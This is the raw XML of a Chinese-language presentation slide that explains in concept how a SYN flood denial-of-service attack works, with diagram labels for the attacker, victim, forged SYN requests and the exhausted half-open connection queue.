              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BF45E76-BDE5-41F5-8D6D-FDBD608A2155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-120000">
            <a:off x="487363" y="5481638"/>
            <a:ext cx="831850" cy="603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我没发过请求</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFA32A9F-4AC9-4B57-9D76-3B557D3560EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341313" y="160338"/>
            <a:ext cx="8451850" cy="415925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>DDoS攻击介绍——SYN Flood</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191493" name="Rectangle 5" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A2D862F-9E93-448E-AD40-D17DA9C6777C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705475" y="1684338"/>
            <a:ext cx="2759075" cy="4557712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPct val="60000"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SYN_RECV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>状态</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPct val="60000"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>半开连接队列</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>遍历，消耗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>和内存</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>SYN|ACK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>重试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>SYN Timeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>秒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>~2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>分钟</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPct val="60000"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>无暇理睬正常的连接请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="华文中宋" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>拒绝服务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191494" name="Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{832B419D-4609-435E-9F9A-CC7831BD4E7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5580063" y="1341438"/>
            <a:ext cx="1587" cy="51831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1495" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF829873-0277-42CE-B5D2-4CA46BFBB96B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5580063" y="1341438"/>
            <a:ext cx="179387" cy="15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1496" name="AutoShape 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7529E3B-75AF-4F89-B7EF-23FCF5297370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="2060575"/>
            <a:ext cx="2879725" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 154468"/>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1497" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D04BF793-8310-45B7-8EB3-44DBB873E647}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1935163" y="2160588"/>
            <a:ext cx="2197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SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（我可以连接吗？）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191498" name="AutoShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F0807DF-3676-40DC-8025-F90BA718152B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="18592798" flipH="1">
            <a:off x="1781175" y="4041775"/>
            <a:ext cx="3249613" cy="468313"/>
          </a:xfrm>
          <a:prstGeom prst="notchedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 160207"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0000FF"/>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1499" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42ADF1F2-04CF-4734-A781-BC96D0947CA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-3007202">
            <a:off x="1655763" y="4062412"/>
            <a:ext cx="3625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ACK </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（可以）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（请确认！）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="191500" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF972049-56E9-4D46-BE1A-5220AC3E2BC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="273050" y="3205163"/>
            <a:ext cx="1504950" cy="1719262"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1296" cy="1984"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="191515" name="Picture 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D88C6F4-E773-4809-8F78-BC11BE33A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516" name="Text Box 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18982C7C-63AE-44EF-814A-EA22EDD87E6A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="241" y="1632"/>
              <a:ext cx="76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攻击者</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="191501" name="Group 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C10B2645-9163-4E59-BF48-28197CE713F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4067175" y="1773238"/>
            <a:ext cx="1400175" cy="1590675"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1449" cy="2084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="191513" name="Picture 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55B3B0F4-47CF-45F2-A0CC-CE02D9713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514" name="Text Box 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4D92F79-34BE-42CD-998F-6468003674C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="337" y="1681"/>
              <a:ext cx="76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受害者</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14354" name="Text Box 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{849A37FD-7FEE-4423-B7BC-F90126D159B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1979613" y="1700213"/>
            <a:ext cx="21701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伪造地址进行</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>请求</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14355" name="Group 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9A4CA6E-BE9F-4C29-9741-1724779EE1AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4427538" y="836613"/>
            <a:ext cx="1008062" cy="711200"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1008" cy="864"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="191511" name="AutoShape 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1250540C-27CA-4473-9AAF-8A139A2FD965}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1008" cy="864"/>
            </a:xfrm>
            <a:prstGeom prst="cloudCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -43750"/>
                <a:gd name="adj2" fmla="val 70000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>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1512" name="Text Box 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BE36C0A-0742-4873-902D-F9626628FBC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="95" y="193"/>
              <a:ext cx="72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3300"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>为何还没回应</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14358" name="Group 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE4458BA-B814-4F9B-B6DB-49D6E61F7533}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="468313" y="2276475"/>
            <a:ext cx="1009650" cy="939800"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1008" cy="864"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="191509" name="AutoShape 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08178328-B8AF-4B9C-92D4-26D1DD1EFB59}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1008" cy="864"/>
            </a:xfrm>
            <a:prstGeom prst="cloudCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -43750"/>
                <a:gd name="adj2" fmla="val 70000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>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400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="191510" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{790F0F6C-09E2-4103-9B54-7FC508237B55}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="97" y="193"/>
              <a:ext cx="719" cy="4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3300"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>就是让你白等</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14361" name="Text Box 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{871BA975-E88E-415A-A905-3351AEE732DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1763713" y="2565400"/>
            <a:ext cx="24193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i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>不能建立正常的连接！</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191506" name="Text Box 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB28E8AE-A4D4-4C25-995C-A50D7A7E7782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="1108075"/>
            <a:ext cx="1879600"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SYN Flood </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击原理</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Franklin Gothic Book" panose="020B0503020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191507" name="Text Box 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38C361DD-9F20-47F3-92E6-0AAEFD28DB24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5795963" y="1125538"/>
            <a:ext cx="2614612"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攻击表象</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
